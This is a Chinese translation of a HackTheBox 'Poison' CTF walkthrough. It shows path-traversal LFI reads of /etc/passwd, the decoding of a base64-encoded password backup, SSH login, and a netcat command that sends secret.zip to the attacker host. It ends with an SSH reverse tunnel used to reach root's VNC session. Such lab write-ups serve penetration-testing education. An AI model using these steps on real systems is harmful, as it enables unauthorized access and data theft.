来源:https://www.absolomb.com/2018-09-08-HackTheBox-Poison/
Poision
是HackTheBox
里面非常简单的一个CTF服务器
,不过它确实包含了一些让有趣且独特东西。
让我们依旧使用nmap进行快速扫描。
root@kali:~# nmap -sV 10.10.10.84
Starting Nmap 7.60 ( https://nmap.org ) at 2018-04-24 12:27 CDT
Nmap scan report for 10.10.10.84
Host is up (0.052s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2 (FreeBSD 20161230; protocol 2.0)
80/tcp open http Apache httpd 2.4.29 ((FreeBSD) PHP/5.6.32)
Service Info: OS: FreeBSD; CPE: cpe:/o:freebsd:freebsd
在浏览器中查看端口80的页面。
我们可以在Scriptname
字段中依次检查这些文件名。当我们提交listfiles.php
时,页面输出了以下内容:
请注意URL的形式,它调用这些文件的方式可能容易受到LFI
的攻击。
我们先来看看pwdbackup.txt,因为这个文件看起来很有趣。
root@kali:~/htb/poison# curl http://10.10.10.84/browse.php?file=pwdbackup.txt
This password is secure, it's encoded atleast 13 times.. what could go wrong really..
Vm0wd2QyUXlVWGxWV0d4WFlURndVRlpzWkZOalJsWjBUVlpPV0ZKc2JETlhhMk0xVmpKS1IySkVU
bGhoTVVwVVZtcEdZV015U2tWVQpiR2hvVFZWd1ZWWnRjRWRUTWxKSVZtdGtXQXBpUm5CUFdWZDBS
bVZHV25SalJYUlVUVlUxU1ZadGRGZFZaM0JwVmxad1dWWnRNVFJqCk1EQjRXa1prWVZKR1NsVlVW
M040VGtaa2NtRkdaR2hWV0VKVVdXeGFTMVZHWkZoTlZGSlRDazFFUWpSV01qVlRZVEZLYzJOSVRs
WmkKV0doNlZHeGFZVk5IVWtsVWJXaFdWMFZLVlZkWGVHRlRNbEY0VjI1U2ExSXdXbUZEYkZwelYy
eG9XR0V4Y0hKWFZscExVakZPZEZKcwpaR2dLWVRCWk1GWkhkR0ZaVms1R1RsWmtZVkl5YUZkV01G
WkxWbFprV0dWSFJsUk5WbkJZVmpKMGExWnRSWHBWYmtKRVlYcEdlVmxyClVsTldNREZ4Vm10NFYw
MXVUak5hVm1SSFVqRldjd3BqUjJ0TFZXMDFRMkl4WkhOYVJGSlhUV3hLUjFSc1dtdFpWa2w1WVVa
T1YwMUcKV2t4V2JGcHJWMGRXU0dSSGJFNWlSWEEyVmpKMFlXRXhXblJTV0hCV1ltczFSVmxzVm5k
WFJsbDVDbVJIT1ZkTlJFWjRWbTEwTkZkRwpXbk5qUlhoV1lXdGFVRmw2UmxkamQzQlhZa2RPVEZk
WGRHOVJiVlp6VjI1U2FsSlhVbGRVVmxwelRrWlplVTVWT1ZwV2EydzFXVlZhCmExWXdNVWNLVjJ0
NFYySkdjR2hhUlZWNFZsWkdkR1JGTldoTmJtTjNWbXBLTUdJeFVYaGlSbVJWWVRKb1YxbHJWVEZT
Vm14elZteHcKVG1KR2NEQkRiVlpJVDFaa2FWWllRa3BYVmxadlpERlpkd3BOV0VaVFlrZG9hRlZz
WkZOWFJsWnhVbXM1YW1RelFtaFZiVEZQVkVaawpXR1ZHV210TmJFWTBWakowVjFVeVNraFZiRnBW
VmpOU00xcFhlRmRYUjFaSFdrWldhVkpZUW1GV2EyUXdDazVHU2tkalJGbExWRlZTCmMxSkdjRFpO
Ukd4RVdub3dPVU5uUFQwSwo=
编码了13次,好吧,让我们快速编写一个python脚本来快速解码,而不是手动一次次执行解码。
import base64
string **=**"""
Vm0wd2QyUXlVWGxWV0d4WFlURndVRlpzWkZOalJsWjBUVlpPV0ZKc2JETlhhMk0xVmpKS1IySkVU
bGhoTVVwVVZtcEdZV015U2tWVQpiR2hvVFZWd1ZWWnRjRWRUTWxKSVZtdGtXQXBpUm5CUFdWZDBS
bVZHV25SalJYUlVUVlUxU1ZadGRGZFZaM0JwVmxad1dWWnRNVFJqCk1EQjRXa1prWVZKR1NsVlVW
M040VGtaa2NtRkdaR2hWV0VKVVdXeGFTMVZHWkZoTlZGSlRDazFFUWpSV01qVlRZVEZLYzJOSVRs
WmkKV0doNlZHeGFZVk5IVWtsVWJXaFdWMFZLVlZkWGVHRlRNbEY0VjI1U2ExSXdXbUZEYkZwelYy
eG9XR0V4Y0hKWFZscExVakZPZEZKcwpaR2dLWVRCWk1GWkhkR0ZaVms1R1RsWmtZVkl5YUZkV01G
WkxWbFprV0dWSFJsUk5WbkJZVmpKMGExWnRSWHBWYmtKRVlYcEdlVmxyClVsTldNREZ4Vm10NFYw
MXVUak5hVm1SSFVqRldjd3BqUjJ0TFZXMDFRMkl4WkhOYVJGSlhUV3hLUjFSc1dtdFpWa2w1WVVa
T1YwMUcKV2t4V2JGcHJWMGRXU0dSSGJFNWlSWEEyVmpKMFlXRXhXblJTV0hCV1ltczFSVmxzVm5k
WFJsbDVDbVJIT1ZkTlJFWjRWbTEwTkZkRwpXbk5qUlhoV1lXdGFVRmw2UmxkamQzQlhZa2RPVEZk
WGRHOVJiVlp6VjI1U2FsSlhVbGRVVmxwelRrWlplVTVWT1ZwV2EydzFXVlZhCmExWXdNVWNLVjJ0
NFYySkdjR2hhUlZWNFZsWkdkR1JGTldoTmJtTjNWbXBLTUdJeFVYaGlSbVJWWVRKb1YxbHJWVEZT
Vm14elZteHcKVG1KR2NEQkRiVlpJVDFaa2FWWllRa3BYVmxadlpERlpkd3BOV0VaVFlrZG9hRlZz
WkZOWFJsWnhVbXM1YW1RelFtaFZiVEZQVkVaawpXR1ZHV210TmJFWTBWakowVjFVeVNraFZiRnBW
VmpOU00xcFhlRmRYUjFaSFdrWldhVkpZUW1GV2EyUXdDazVHU2tkalJGbExWRlZTCmMxSkdjRFpO
Ukd4RVdub3dPVU5uUFQwSwo= """
**def**** decode**(b64\_string, iterations):
i **=** 0
**while** i **\<** iterations:
b64\_string **=** base64 **.** b64decode(b64\_string) **.** decode('utf-8')
i **+=** 1
**print** (b64\_string)
decode(string, 13)
测试脚本并运行:
root@kali:~/htb/poison# python3 decode.py
Charix!2#4%6&8(0
OK!我们得到了密码,但我们仍然需要知道用户名。
让我们测试一下是否存在LFI
漏洞。
root@kali:~/htb/poison# curl http://10.10.10.84/browse.php?file=../../../etc/passwd
\<br /\>
\<b\>Warning\</b\>: include(../../../etc/passwd): failed to open stream: No such file or directory in \<b\>/usr/local/www/apache24/data/browse.php\</b\> on line \<b\>2\</b\>\<br /\>
\<br /\>
\<b\>Warning\</b\>: include(): Failed opening '../../../etc/passwd' for inclusion (include\_path='.:/usr/local/www/apache24/data') in \<b\>/usr/local/www/apache24/data/browse.php\</b\> on line \<b\>2\</b\>\<br /\>
我们在这里可以看到确实使用了include(),我们也看到了包含的路径,所以我们需要跳五层目录才能跳到根目录。
root@kali:~/htb/poison# curl http://10.10.10.84/browse.php?file=../../../../../etc/passwd
# $FreeBSD: releng/11.1/etc/master.passwd 299365 2016-05-10 12:47:36Z bcr$
#
root:\*:0:0:Charlie &:/root:/bin/csh
toor:\*:0:0:Bourne-again Superuser:/root:
daemon:\*:1:1:Owner of many system processes:/root:/usr/sbin/nologin
operator:\*:2:5:System &:/:/usr/sbin/nologin
bin:\*:3:7:Binaries Commands and Source:/:/usr/sbin/nologin
tty:\*:4:65533:Tty Sandbox:/:/usr/sbin/nologin
kmem:\*:5:65533:KMem Sandbox:/:/usr/sbin/nologin
games:\*:7:13:Games pseudo-user:/:/usr/sbin/nologin
news:\*:8:8:News Subsystem:/:/usr/sbin/nologin
man:\*:9:9:Mister Man Pages:/usr/share/man:/usr/sbin/nologin
sshd:\*:22:22:Secure Shell Daemon:/var/empty:/usr/sbin/nologin
smmsp:\*:25:25:Sendmail Submission User:/var/spool/clientmqueue:/usr/sbin/nologin
mailnull:\*:26:26:Sendmail Default User:/var/spool/mqueue:/usr/sbin/nologin
bind:\*:53:53:Bind Sandbox:/:/usr/sbin/nologin
unbound:\*:59:59:Unbound DNS Resolver:/var/unbound:/usr/sbin/nologin
proxy:\*:62:62:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologin
\_pflogd:\*:64:64:pflogd privsep user:/var/empty:/usr/sbin/nologin
\_dhcp:\*:65:65:dhcp programs:/var/empty:/usr/sbin/nologin
uucp:\*:66:66:UUCP pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico
pop:\*:68:6:Post Office Owner:/nonexistent:/usr/sbin/nologin
auditdistd:\*:78:77:Auditdistd unprivileged user:/var/empty:/usr/sbin/nologin
www:\*:80:80:World Wide Web Owner:/nonexistent:/usr/sbin/nologin
\_ypldap:\*:160:160:YP LDAP unprivileged user:/var/empty:/usr/sbin/nologin
hast:\*:845:845:HAST unprivileged user:/var/empty:/usr/sbin/nologin
nobody:\*:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/nologin
\_tss:\*:601:601:TrouSerS user:/var/empty:/usr/sbin/nologin
messagebus:\*:556:556:D-BUS Daemon User:/nonexistent:/usr/sbin/nologin
avahi:\*:558:558:Avahi Daemon User:/nonexistent:/usr/sbin/nologin
cups:\*:193:193:Cups Owner:/nonexistent:/usr/sbin/nologin
charix:\*:1001:1001:charix:/home/charix:/bin/csh
我们看到有一个charix
的用户名。
让我们用这个用户名和密码试试ssh
。
root@kali:~/htb/poison# ssh charix@10.10.10.84
Password for charix@Poison:
Last login: Mon Mar 19 16:38:00 2018 from 10.10.14.4
FreeBSD 11.1-RELEASE (GENERIC) #0 r321309: Fri Jul 21 02:08:28 UTC 2017
Welcome to FreeBSD!
Release Notes, Errata: https://www.FreeBSD.org/releases/
Security Advisories: https://www.FreeBSD.org/security/
FreeBSD Handbook: https://www.FreeBSD.org/handbook/
FreeBSD FAQ: https://www.FreeBSD.org/faq/
Questions List: https://lists.FreeBSD.org/mailman/listinfo/freebsd-questions/
FreeBSD Forums: https://forums.FreeBSD.org/
Documents installed with the system are in the /usr/local/share/doc/freebsd/
directory, or can be installed later with: pkg install en-freebsd-doc
For other languages, replace "en" with a language code like de or fr.
Show the version of FreeBSD installed: freebsd-version ; uname -a
Please include that output and any error messages when posting questions.
Introduction to manual pages: man man
FreeBSD directory layout: man hier
Edit /etc/motd to change this login announcement.
You can often get answers to your questions about FreeBSD by searching in the
FreeBSD mailing list archives at
http://www.FreeBSD.org/search/search.html
charix@Poison:~ %
很好!
查看主目录,我们看到一个可疑的zip文件。
charix@Poison:~ % ls -al
total 48
drwxr-x--- 2 charix charix 512 Mar 19 17:16 .
drwxr-xr-x 3 root wheel 512 Mar 19 16:08 ..
-rw-r----- 1 charix charix 1041 Mar 19 17:16 .cshrc
-rw-rw---- 1 charix charix 0 Mar 19 17:17 .history
-rw-r----- 1 charix charix 254 Mar 19 16:08 .login
-rw-r----- 1 charix charix 163 Mar 19 16:08 .login\_conf
-rw-r----- 1 charix charix 379 Mar 19 16:08 .mail\_aliases
-rw-r----- 1 charix charix 336 Mar 19 16:08 .mailrc
-rw-r----- 1 charix charix 802 Mar 19 16:08 .profile
-rw-r----- 1 charix charix 281 Mar 19 16:08 .rhosts
-rw-r----- 1 charix charix 849 Mar 19 16:08 .shrc
-rw-r----- 1 root charix 166 Mar 19 16:35 secret.zip
-rw-r----- 1 root charix 33 Mar 19 16:11 user.txt
让我们用netcat将这个zip文件传到我们的本地机器上。
charix@Poison:~ % nc -w 2 10.10.14.8 443 \< secret.zip
root@kali:~/htb/poison# nc -lvnp 443 \> secret.zip
listening on [any] 443 ...
connect to [10.10.14.8] from (UNKNOWN) [10.10.10.84] 13787
这个zip文件受密码保护,但我们可以尝试使用charix用户的ssh密码来解压缩。竟然可以!
root@kali:~/htb/poison# unzip secret.zip
Archive: secret.zip
[secret.zip] secret password:
extracting: secret
检查文件格式,我们可以看到它应该是一个常规的ASCII文件。
root@kali:~/htb/poison# file secret
secret: Non-ISO extended-ASCII text, with no line terminators
root@kali:~/htb/poison# cat secret
[|Ֆz!
然而,文件内容是一些垃圾字符。
让我们再仔细了解一下这台服务器吧。
使用ps aux
检查运行的进程后,我们看到以下几个有趣的内容。
root 529 0.0 0.9 23620 8996 v0- I 19:17 0:00.22 Xvnc :1 -desktop X -httpd /usr/local/share/tightvnc/classes -auth /root/.Xauthority -geo
root 540 0.0 0.7 67220 7060 v0- I 19:17 0:00.07 xterm -geometry 80x24+10+10 -ls -title X Desktop
我们还看到一些监听在本地的端口。
charix@Poison:~ % netstat -an
Active Internet connections (including servers)
Proto Recv-Q Send-Q Local Address Foreign Address (state)
tcp4 0 0 10.10.10.84.22 10.10.14.8.44976 ESTABLISHED
tcp4 0 0 127.0.0.1.25 \*.\* LISTEN
tcp4 0 0 \*.80 \*.\* LISTEN
tcp6 0 0 \*.80 \*.\* LISTEN
tcp4 0 0 \*.22 \*.\* LISTEN
tcp6 0 0 \*.22 \*.\* LISTEN
tcp4 0 0 127.0.0.1.5801 \*.\* LISTEN
tcp4 0 0 127.0.0.1.5901 \*.\* LISTEN
udp4 0 0 \*.514 \*.\*
udp6 0 0 \*.514 \*.\*
端口5801和5901通常是VNC服务使用,这与我们在进程列表中看到的正在运行的VNC会话相匹配。让我们把端口转发到我们的本地机器上,这样我们就可以访问了(确保你在本地机器上已经启动了SSH!)。
charix@Poison:~ % ssh -l root -R 5801:127.0.0.1:5901 10.10.14.8
root@10.10.14.8's password:
The programs included with the Kali GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/\*/copyright.
Kali GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
root@kali:~#
如果我们检查kali上的监听连接,我们会看到端口转发已经成功。
root@kali:~# netstat -ant
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State
tcp 0 0 0.0.0.0:22 0.0.0.0:\* LISTEN
tcp 0 0 127.0.0.1:5801 0.0.0.0:\* LISTEN
tcp 0 0 10.10.14.8:44976 10.10.10.84:22 ESTABLISHED
tcp 0 0 10.10.14.8:22 10.10.10.84:54672 ESTABLISHED
tcp6 0 0 :::22 :::\* LISTEN
tcp6 0 0 ::1:5801 :::\* LISTEN
Vncviewer
支持-passwd
选项,所以我们可以将passwd
文件传递给它来进行身份验证,因此我们可能会传递我们之前拿到的那个secret
文件进行身份验证。
root@kali:~/htb/poison# vncviewer -h
TightVNC Viewer version 1.3.9
Usage: vncviewer [\<OPTIONS\>] [\<HOST\>][:\<DISPLAY#\>]
vncviewer [\<OPTIONS\>] [\<HOST\>][::\<PORT#\>]
vncviewer [\<OPTIONS\>] -listen [\<DISPLAY#\>]
vncviewer -help
\<OPTIONS\> are standard Xt options, or:
-via \<GATEWAY\>
-shared (set by default)
-noshared
-viewonly
-fullscreen
-noraiseonbeep
-passwd \<PASSWD-FILENAME\> (standard VNC authentication)
~
~
root@kali:~/htb/poison# vncviewer -passwd secret 127.0.0.1:5801
Connected to RFB server, using protocol version 3.8
Enabling TightVNC protocol extensions
Performing standard VNC authentication
Authentication successful
Desktop name "root's X desktop (Poison:1)"
没错,搞定了!